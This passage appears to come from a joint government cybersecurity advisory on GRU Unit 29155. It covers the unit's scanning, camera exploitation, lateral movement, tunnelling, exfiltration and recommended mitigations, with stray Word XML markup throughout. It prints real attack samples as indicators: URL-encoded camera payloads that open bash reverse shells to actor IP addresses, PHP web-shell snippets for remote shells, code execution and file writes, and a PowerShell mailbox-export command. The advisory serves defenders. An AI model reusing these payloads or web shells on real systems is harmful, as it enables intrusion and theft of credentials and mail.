misattribution.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Unit 29155 actors and their cyber-criminal affiliates commonly maintain accounts on dark web forums; this has provided the opportunity to obtain various hacker tools such as malware and malware loaders [T1588.001] like Raspberry Robin and SaintBot. While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine, the use of WhisperGate is not unique to the group. Technical analysis can be found in Appendix A: WhisperGate Malware Analysis. Initial Access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Unit 29155 cyber actors are known to use VPNs to anonymize their operational activity. These cyber actors commonly attempt to exploit weaknesses in internet-facing systems, like the CVEs listed above, to initially access networks. In one instance, Unit 29155 cyber actors exploited CVE-2021-33044 and CVE-2021-33045 on Dahua IP cameras to bypass identity authentication. Lateral Movement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Unit 29155 cyber actors have used Shodan to scan for Internet of Things (IoT) devices, using exploitation scripts to authenticate to IP cameras with default usernames and passwords [T1078.001], and exfiltrating images [T1125] (JPG files). Attempts are then made to perform remote command execution via web to vulnerable IP cameras; if successful, cyber actors would dump configuration settings and credentials in plaintext (as shown in Table 1 below) [T1552.001].</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Appendix B: Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this section.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Note: These events are independent and not correlated as a single timeline of compromise.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Event Victim Observation Web requests observed from victim infrastructure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These requests are likely intended to dump configuration settings and credentials [T1003]:</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hxxp://&lt;IP&gt;:&lt;port&gt;/PictureCatch.cgi?username=&lt;NAME&gt;&amp;password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&amp;data_type=1&amp;attachment=1&amp;channel=1&amp;secret=1&amp;key=PWNED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hxxp://&lt;IP&gt;:&lt;port&gt;/ssi.cgi/tmp/Login.htm POST requests sent to victims with payloads [T1071.001]</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"txtUser=lol&amp;txtPassword=2&amp;btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&amp;chRemember=on&amp;txtPassword=g00dPa%24%24w0rD&amp;txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F179.43.175.38%2F6870%200%3E%261%22))%7d"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"txtUser=lol&amp;txtPassword=2&amp;btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&amp;chRemember=on&amp;txtPassword=g00dPa%24%24w0rD&amp;txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F81.17.24.130%2F6870%200%3E%261%22))%7d"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URL encoded values from txtUser for both commands decoded to embedded bash commands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${@print(system("bash -i &gt;&amp; /dev/tcp/179.43.175.38/6870 0&gt;&amp;1"))}</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${@print(system("bash -i &gt;&amp; /dev/tcp/81.17.24.130/6870 0&gt;&amp;1"))}</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addition, incident analysis identified the general observations listed below on victim infrastructure. Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes. Appendix B: Indicators of Compromise lists IOCs associated with the observations in Table 1 and below.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>In one instance shortly following a deployment of WhisperGate malware, Unit 29155 cyber actors exfiltrated data to mega[.]nz using Rclone [T1567.002]. Unit 29155 cyber actors used a Pass-the-Hash [T1550.002] via ProxyChains. Cyber actors performed SSH and SSHPass executions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors initiated a web request and executed commands via ProxyChains. This included obtaining NT hashes via Server Message Block (SMB) using smbclient, executing Windows Management Instrumentation (WMI) with hashes, and making web requests with resources i.php and tunnel.jsp. In one instance, cyber actors used smbclient via ProxyChains to access internal network shares, and subsequently PSQL and MySQL clients to access internal databases.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors used Impacket for post-exploitation and lateral movement. The script secretsdump.py was used from the Impacket framework to obtain domain credentials, while psexec.py was subsequently used to move laterally within a victim network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors used ntlmrelayx.py via Impacket and krbrelayx.py, which requires Impacket to function.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors used Responder.py.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors used su-bruteforce to brute force a selected user using the su command.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors used BloodHound, an open source AD reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors used CrackMapExec via ProxyChains with SMB protocol targeting internal victim IP addresses. This open source post-exploitation tool automates assessing the security of large AD networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors used LinPEAS, an open source script designed to automate the process of searching for potential privilege escalation vulnerabilities on a Linux victim.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors used GO Simple Tunnel (GOST) (MD5: 896e0f54fc67d72d94b40d7885f10c51) for 30 days within one incident and against additional victims on various occasions. GOST is a tunneling tool designed to establish secure connections between clients and servers, allowing for secure data transmission over untrusted networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors used Through the Wire against a victim's internet-facing Confluence server. Through the Wire is a proof of concept[14] exploit for CVE-2022-26134, an OGNL injection vulnerability allowing an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. All versions of Confluence Server and Data Center prior to the fixed versions listed by Atlassian are affected by this vulnerability.[15] A reverse shell over HTTPS was used to communicate over listening host on port 8081.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors initiated Nmap scans on localized web servers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors performed lateral movement from compromised web servers to exploit a corporate Microsoft Windows network, commonly using psexec.py from the Impacket framework. The script secretsdump.py from the Impacket framework was used to obtain domain credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors may have used Raspberry Robin malware in the role of an access broker [T1588.001].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber actors targeted victims' Microsoft Outlook Web Access (OWA) infrastructure with password spraying to obtain valid usernames and passwords [T1110.003]. Command and Control Infrastructure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Since at least 2020, Unit 29155 cyber actors have used virtual private servers (VPSs) [T1583.003] to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Use of VPSs are common due to the associated IP addresses not identifying their true country of origin. Post-Exploitation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When an exploit is successfully executed on a victim system, the actors can then launch a Meterpreter payload [T1105], which commonly uses a reverse Transmission Control Protocol (TCP) connection to initiate communication with the threat actors' infrastructure [T1095]. In one instance, an established reverse TCP session was observed from victim to actor infrastructure via the following ports: 1234 1851 43221 443 4444 4688 5432 8080 8081 8082 8084 8085 8088 8089 8090 8443 8487 8888</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Additional observations were collected from victim engagement and analysis, including: Use of the Metasploit Framework to search for and/or access modules such as mysql, postgres, and ssh software and features.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use of Meterpreter and Netcat to execute reverse shells over ports such as 8081. Use of Impacket.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use of PHP (exp_door v1.0.2, b374k, WSO 4.0.5) and the P.A.S. web shells [T1505.003], likely for initial access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use of EternalBlue.[16],[17] Use of reGeorg or Neo-reGeorg to set up a proxy to tunnel network traffic following compromise of a victim website, as well as use of ProxyChains to run Nmap within the network. Encrypted Communication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Once Unit 29155 cyber actors gain access to the victims' internal network, the victims have observed: Using Domain Name System (DNS) tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic [T1071.004]. For </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>example, Iodine was used to tunnel data via dns.test658324901domain.me.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Configuring a proxy within the victim infrastructure and executing commands within the network via ProxyChains. ProxyChains-a tool used to route internal traffic through a series of proxies [T1090.003]-has been used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports. The following ports used by actor infrastructure include: 1080 1333 13381 13391 13666 13871 1448 1888 3130 3140 4337 50001 8079 Using the GOST open source tunneling tool (via SOCKS5 proxy) named java, as detailed in the following running processes in victim incident response results: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8212 - SJ 0:02.54 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME=/ RC PID=33980 ./java -L socks5://127.0.0.1:13338</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8282 - IJ 0:03.98 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://{IP Address}:7896 Modifying .php scripts to manipulate server-side operations, such as the observations listed in Table 2 below.</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Script (Base64 Decoded) Command Purpose usr/local/www/apache24/data/-redacted-/plugins/extension/oomla/oomla.php</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if (isset($ POST ["sessionsid_wp"] ))</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$poll id = $ POST ["sessionsid_wp") ;</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$sessii = explode(":",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base64_decode($poll_id)) ;$sock=fsockopen($sessii[O) ,$sessii[l));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$proc=proc_open(/bin/sh -i), array(O=&gt;$sock, l=&gt;$sock,</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2=&gt;$sock) ,$pipes);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Creates session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Usr/local/www/apache24/data/-redacted- /plugins/authentication/joomla/oomla.php</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function nb_res($a)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eval(system('base64 decode ($a) ');</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Allows program to run.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Usr/local/www/apache24/data/-redacted-/plugins/privacy/contact/contact.php</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if (isset($_POST['fl']))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$fl=$_POST['fl'] ;</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$f2=$_POST['f2'] ;</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$content = base64 decode($fl);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 = fopen($f2."w");</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$text = "$content";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fwrite($h.$text) ;</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fclose ($h) ;</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Allows writing to files.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Exfiltration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several instances, analysis identified Unit 29155 cyber actors compressing victim data [T1560] (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure. These cyber actors commonly use the command-line program Rclone to exfiltrate data to a remote location from victim infrastructure.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Unit 29155 cyber actors have exfiltrated Windows processes and artifacts, such as Local Security Authority Subsystem Service (LSASS) memory dumps [T1003.001], Security Accounts Manager (SAM) files [T1003.002], and SECURITY and SYSTEM event log files [T1654]. As seen in victim incident response results, actor infrastructure has also been used to compromise multiple mail servers [T1114] and exfiltrate mail artifacts, such as email messages, using PowerShell [T1059.001] via the following command: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powershell New-MailboxExportRequest - Mailbox &lt;resource&gt; - FilePath `\\{IP Address}\sharefolder\1.pst` MITRE ATT&amp;CK Tactics and Techniques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See Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool.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3: Reconnaissance Technique Title ID Use Gather Victim Network Information: DNS T1590.002 Unit 29155 cyber actors have used Amass and VirusTotal to obtain information about victims' DNS for possible use during targeting, such as subdomains for target websites. Active Scanning T1595 Unit 29155 cyber actors use publicly available tools to gather information for possible use during targeting.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Active Scanning: Scanning IP Blocks T1595.001 Unit 29155 cyber actors use various open source scanning tools to scan for victim IP ranges.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Active Scanning: Vulnerability Scanning T1595.002 Unit 29155 cyber actors use publicly available scanning tools to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>enable their discovery of IoT devices and exploitable vulnerabilities. Tools leveraged for scanning include Acunetix, Amass, Droopescan, eScan, and JoomScan.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Search Open Technical Databases: Scan Databases T1596.005 Unit 29155 cyber actors use publicly available platforms like Shodan to identify internet connected hosts.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4: Resource Development Technique Title ID Use Acquire Infrastructure: Virtual Private Server T1583.003 Unit 29155 cyber actors have used VPSs to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Obtain Capabilities: Malware T1588.001 Unit 29155 cyber actors obtain publicly available malware and malware loaders to support their operations. For example, analysis suggests Raspberry Robin malware may have been used in the role of an access broker.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Obtain Capabilities: Exploits T1588.005 Unit 29155 cyber actors are known to obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure.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5: Initial Access Technique Title ID Use Valid Accounts: Default Accounts T1078.001 Unit 29155 cyber actors use exploitation scripts to authenticate to IP cameras with default usernames and passwords.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exploit Public-Facing Application T1190</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Unit 29155 cyber actors have used a variety of public exploits, including CVE-2021-33044, CVE-2021-33045, CVE-2022-26134, and CVE-2022-26138.</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proof of concept exploit for CVE-2022-26134, Through the Wire, has also been used against a victim's internet-facing Confluence server.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6: Execution Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 Unit 29155 cyber actors have used PowerShell to execute commands and other operational tasks.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7: Persistence Technique Title ID Use Server Software Component: Web Shell T1505.003 Unit 29155 cyber actors use web shells to establish persistent access to systems.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8: Credential Access Technique Title ID Use OS Credential Dumping: LSASS Memory T1003.001 Unit 29155 cyber actors have exfiltrated LSASS memory dumps to retrieve credentials from victim machines. OS Credential Dumping: Security Account Manager T1003.002 Unit 29155 cyber actors have exfiltrated usernames and hashed passwords from the SAM. Brute Force: Password Spraying T1110.003 Unit 29155 cyber actors targeted victims' Microsoft OWA infrastructure with password spraying to obtain valid usernames and passwords.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Unsecured Credentials: Credentials in Files T1552.001 Following exploitation of vulnerable IP cameras, Unit 29155 cyber actors dump configuration settings and credentials in plaintext.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9: Discovery Technique Title ID Use Network Service Discovery T1046 Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the NSE) to write custom scripts for discovering and scanning other machines.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Log Enumeration T1654 Unit 29155 cyber actors have enumerated and exfiltrated SECURITY and SYSTEM logs.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10: Lateral Movement Technique Title ID Use Use Alternate Authentication Material: Pass the Hash T1550.002 Unit 29155 cyber actors used Pass-the-Hash to authenticate via SMB.</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11: Collection Technique Title ID Use Email Collection T1114 Unit 29155 cyber actors have used their infrastructure to compromise multiple victims' mail servers and exfiltrate mail artifacts, such as email messages.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Video Capture T1125 Unit 29155 cyber actors have exploited IoT devices, specifically IP cameras with default usernames and passwords, and exfiltrated images.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Data from Information Repositories: Confluence T1213.001 Unit 29155 cyber actors leveraged Through the Wire against the victim's internet-facing Confluence server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Archive Collected Data T1560 Unit 29155 cyber actors compress victim data (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure.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12: Command and Control Technique Title ID Use Proxy: Multi-hop Proxy T1090.003</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Unit 29155 cyber actors executed commands via ProxyChains-a tool used to route internal traffic through a series of proxies.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ProxyChains was also used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Application Layer Protocol: Web Protocols T1071.001 Unit 29155 cyber actors use POST requests over HTTP to send payloads to victims.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Application Layer Protocol: DNS T1071.004 Unit 29155 cyber actors used DNS tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Non-Application Layer Protocol T1095 Unit 29155 cyber actors commonly use a reverse TCP connection to initiate communication with their infrastructure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ingress Tool Transfer T1105 When an exploit is successfully executed on a victim system, Unit 29155 cyber actors are known to launch the Meterpreter payload to initiate communication with their actor-controlled systems. Protocol Tunneling T1572 Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration to tunnel traffic over a single port (1194), VPNs, and GOST to anonymize their operational activity.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13: Exfiltration Technique Title ID Use Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Unit 29155 cyber actors exfiltrated data to the cloud storage and file hosting service, MEGA (mega[.]nz), using Rclone.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Table 14: Impact Technique Title ID Use Data Destruction T1485 Unit 29155 cyber actors' objectives include the destruction of data. Mitigations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authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Limit Adversarial Use of Common Vulnerabilities Prioritize patching to CISA's Known Exploited Vulnerabilities Catalog, especially for CVEs identified in this advisory, and then critical and high vulnerabilities that allow for remote code execution on internet-facing devices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Conduct regular automated vulnerability scans to perform vulnerability assessments on all network resources based on threat actor behaviors and known exploitable vulnerabilities (CISA CPG 1.E).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Limit exploitable services on internet-facing assets, such as email and remote management protocols (CISA CPGs 2.M, 2.W). Where necessary services must be exposed, such as services hosted in a demilitarized zone (DMZ), implement the appropriate compensatory controls to prevent common forms of abuse and exploitation. Disable all unnecessary operating system applications and network protocols to combat adversary enumeration. For additional guidance, see CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>U.S. organizations can utilize a range of CISA services at no cost, including vulnerability scanning and testing, to help organizations reduce exposure to threats. CISA Cyber Hygiene services can provide additional review of internet-accessible assets and provide regular reports on steps to take to mitigate vulnerabilities. Email vulnerability@cisa.dhs.gov with the subject line, "Requesting Cyber Hygiene Services," to get started. Software manufacturers, vendors, and consumers are encouraged to review CISA and NIST's Defending Against Supply Chain Attacks. This publication provides an overview of software supply chain risks and recommendations for how software customers and vendors can use the NIST Cyber Supply Chain Risk Management (C-SCRM) Framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate software supply chain risks. CISA recommends comprehensive mitigations for supply chain incident reporting, vulnerability disclosing (e.g., security.txt), and choosing a trusted supplier or vendor that observes proper cyber security hygiene (CISA CPG 1.G, 1.H, 1.I) to defend against upstream attacks. Deploy Protective Controls and Architecture Implement network segmentation. Network segmentation can help prevent lateral movement by controlling traffic flows between-and access to-various subnetworks (CISA CPG 2.F). Best practice mitigations include updating Identity and Access Management (IAM) and employing phishing-resistant MFA for all devices and accounts identified as organizational assets. For additional guidance, see CISA and NSA's IAM Recommended Best Practices Guide for Administrators (CISA CPG 2.H).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Verify and ensure that sensitive data, including credentials, are not stored in plaintext and can only be accessed by authenticated and authorized users. Credentials must be stored in a secure manner, such as with a credential/password manager to protect from malicious enumeration (CISA CPG 2.L).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable and/or restrict use of command line and PowerShell activity. Update to the latest version and uninstall all earlier PowerShell versions (CISA CPG 2.N).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement a continuous system monitoring program, such as security information and event management (SIEM) or endpoint detection and response (EDR) solutions, to comprehensively log and review all authorized external access connections. This logging will better ensure the prompt detection of misuse or abnormal activity (CISA CPG 2.T).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Monitor for unauthorized access attempts and programming anomalies through comprehensive logging that is secured from modification, such as limiting permissions and adding redundant remote logging (CISA CPG 2.U). Security appliances should be set to detect and/or block Impacket framework indicators, PSExec or WMI commands, and suspicious PowerShell commands for timely identification and remediation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
